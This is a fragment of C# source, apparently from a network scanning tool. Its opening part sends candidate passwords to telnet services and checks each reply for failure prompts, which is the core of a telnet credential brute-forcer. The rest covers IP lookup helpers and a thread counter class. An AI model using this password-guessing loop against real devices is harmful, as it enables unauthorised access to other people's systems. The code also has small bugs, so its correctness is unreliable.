                            //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + Convert.ToChar(13) + Convert.ToChar(10)));
                            sock.Send(System.Text.Encoding.ASCII.GetBytes(password));
                            //Thread.Sleep(100);
                            byte[] data = new byte[1024];
                            //string banner;
                            int recv;
                            recv = sock.Receive(data);
                            string stringdata = Encoding.ASCII.GetString(data, 0, recv);
                            Console.WriteLine("{0} -> Response telnet: " + stringdata);

                            ///*
                            //strRetPage = null;
                            //bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
                            //strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);

                            //while (bytes > 0)
                            //{
                            //    bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
                            //    strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
                            //}
                            //Console.WriteLine("Response telnet: " + strRetPage);
                            //*

                            //Bad Password!!!
                            if (stringdata.Contains("*") || stringdata.Contains("Password:") || stringdata.Contains("Bad Password"))
                            {
                                Console.Write("{0} -> bad telnet password: {1}\n", password);
                            }
                        }
                        catch (Exception e)
                        {
                            Console.WriteLine("{0} -> " + e.Message);
                        }
                    }

                }



            }
            else
            {
                // If no data was recieved then the connection is probably dead
                Console.WriteLine("Disconnected", sock.RemoteEndPoint);
                sock.Shutdown(SocketShutdown.Both);
                sock.Close();
            }
        }
        
        public string LocalIPAddress()
        {
            IPHostEntry host;
            string localIP = "";
            host = Dns.GetHostEntry(Dns.GetHostName());
            foreach (IPAddress ip in host.AddressList)
            {
                if (ip.AddressFamily.ToString() == "InterNetwork")
                {
                    localIP = ip.ToString();
                }
            }
            return localIP;
        }

        public static IPAddress GetExternalIp()
        {
            string whatIsMyIp = "http://www.whatismyip.com/automation/n09230945.asp";
            WebClient wc = new WebClient();
            UTF8Encoding utf8 = new UTF8Encoding();
            string requestHtml = "";
            try
            {
                requestHtml = utf8.GetString(wc.DownloadData(whatIsMyIp));
            }
            catch (WebException we)
            {
                // do something with exception
                Console.Write(we.ToString());
            }

            IPAddress externalIp = IPAddress.Parse(requestHtml);
            return externalIp;
        }

        public static IPAddress GetExternalIp2()
        {
            WebClient client = new WebClient();

            // Add a user agent header in case the requested URI contains a query.
            client.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)");

            string baseurl = "http://checkip.dyndns.org/";

            Stream data = client.OpenRead(baseurl);
            StreamReader reader = new StreamReader(data);
            string s = reader.ReadToEnd();
            data.Close();
            reader.Close();
            s = s.Replace("<html><head><title>Current IP Check</title></head><body>Current IP Address: ", "").Replace("</body></html>", "").ToString();
            
            IPAddress externalIp = IPAddress.Parse(s);
            return externalIp;
        }

        private void Lancer_Thread(object emetteur)
        {
            //Console.WriteLine("Evenement - Lancer_Thread");
            lock (this)
            {
            //    Console.WriteLine("DEBUG PULSE");
                Monitor.Pulse(this);
            }
        }

        public class Compteur_thread
        {
            public enum Operation
            {
                Incrementer = 1,
                Decrementer = 2,
                Nb_thread = 3,
                Libre = 4,
            }

            Operation operation = Operation.Incrementer;

            int compteur = 0;

            public delegate void Lancer_Thread(object emetteur);

            public event Lancer_Thread lancer_thread;

            public void Incrementer()
            {
                lock (this)
                {
                //    Console.WriteLine("DEBUG INCREMENTER");
                    if ((operation == Operation.Decrementer) || (operation == Operation.Nb_thread))
                    {
                        try
                        {
                            //Console.WriteLine("Incrementer - Monitor.Wait()");
                            Monitor.Wait(this);
                        }
                        catch (SynchronizationLockException e)
                        {
                            Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
                        }
                        catch (ThreadInterruptedException e)
                        {
                            Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
                        }
                    }

                    //Console.WriteLine("Incrementer");

                    operation = Operation.Incrementer;
                    compteur++;

                    Monitor.Pulse(this);
                    operation = Operation.Libre;
                }
            }

            public void Decrementer()
            {
                lock (this)
                {
                //    Console.WriteLine("DEBUG DECREMENTER");
                    if ((operation == Operation.Incrementer) || (operation == Operation.Nb_thread))
                    {
                        try
                        {
                            //Console.WriteLine("decrementer - Monitor.Wait()");
                            Monitor.Wait(this);
                        }
                        catch (SynchronizationLockException e)
                        {
                            Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
                        }
                        catch (ThreadInterruptedException e)
                        {
                            Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
                        }
                    }
                    //Console.WriteLine("decrementer");

                    operation = Operation.Decrementer;
                    compteur--;

                    if (lancer_thread != null)
                        lancer_thread(this);

                    Monitor.Pulse(this);
                    operation = Operation.Libre;
                }
            }

            public void Nb_thread(out int nb)
            {
                lock (this)
                {
                //    Console.WriteLine("DEBUG NB_THREAD");
                    if ((operation == Operation.Incrementer) || (operation == Operation.Decrementer))
                    {
                        try
                        {
                            //Console.WriteLine("Nb_thread - Monitor.Wait()");
                            Monitor.Wait(this);
                        }
                        catch (SynchronizationLockException e)
                        {
                            Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
                        }
                        catch (ThreadInterruptedException e)
                        {
                            Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
                        }
                    }

                    //Console.WriteLine("Nb_Thread classe");

                    operation = Operation.Nb_thread;
                    nb = compteur;

                    Monitor.Pulse(this);
                    operation = Operation.Libre;
                }
            }
        }

    }    



}